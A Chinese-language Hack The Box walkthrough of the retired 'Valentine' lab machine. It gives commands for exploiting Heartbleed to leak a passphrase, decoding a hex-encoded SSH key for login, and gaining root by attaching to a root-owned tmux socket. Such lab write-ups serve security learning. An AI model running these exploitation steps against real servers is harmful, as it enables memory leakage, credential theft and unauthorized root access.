zoukankan      html  css  js  c++  java
  • HTB-靶机-Valentine

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.79

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.79 -o ./Valentine-autorecon

    开放了3个端口,先访问443端口看看

    看图像是存在心脏出血漏洞,漏洞详情可以参考:https://zh.m.wikipedia.org/zh-hans/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E

    针对可以直接拿poc测试可以快速确认是否真的存在,也可以使用nmap的心脏漏洞扫描脚本进行扫描确认,我这里给出3个exploit,具体如下:

    心脏出血漏洞,通过在kali中搜索searchsploit heartbleed
    可获得可利用exploit 32745.py 和 32764.py 这两个exploit执行的结果一样,但是需要每次手动执行
    
    不停的执行如下命令:
    python 32745.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
    $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
    
    指定执行次数,不停地执行心脏出血漏洞,以发现重要敏感信息为准
    https://github.com/sensepost/heartbleed-poc/blob/master/heartbleed-poc.py
    执行如下命令:
    python heartbleed-poc.py 10.10.10.79 -n 150 -f heartdumbin.txt
    然后使用strings命令查询heartdumbin.txt 发现如下敏感信息
    $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
    
    上述解码后信息
    echo -n "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
    
    heartbleedbelievethehype

    得到base64编码的值然后解码即可,通过目录爆破发现如下目录信息

    访问dev目录

    得到上面信息,根据其中一个文件的提示,得知是需要先得到上面的解码信息,然后16进制密钥转换即可,这里提下上面访问的两个文件使用80或者443端口都可以正常访问,我这里就直接使用curl命令加-O参数下载此文件到本地kali然后使用xxd命令进行解码

    将其此文件重定向到id_rsa文件里面然后给600权限远程ssh登录到目标靶机

    登录目标靶机

    使用ps -ef命令查看当前进程

    发现已经有使用tmux命令开启的root进程会话,直接切换至此root会话即可提权

    tmux -S /.devs/dev_sess

  • 相关阅读:
    Cognos无法解密来着内容库的用户名和密码凭证
    JavaScript 中的对象引用
    npm install出现的错误
    箭头函数中this的用法
    [译]ArcGIS Server Map Service Cache的组织结构
    [C#] 如何选择抽象基类与接口
    数据库设计规范
    在DataTable中查询应该注意的问题
    坦克大战总结
    仓库管理系统总结(1)
  • 原文地址:https://www.cnblogs.com/autopwn/p/14086178.html
Copyright © 2011-2022 走看看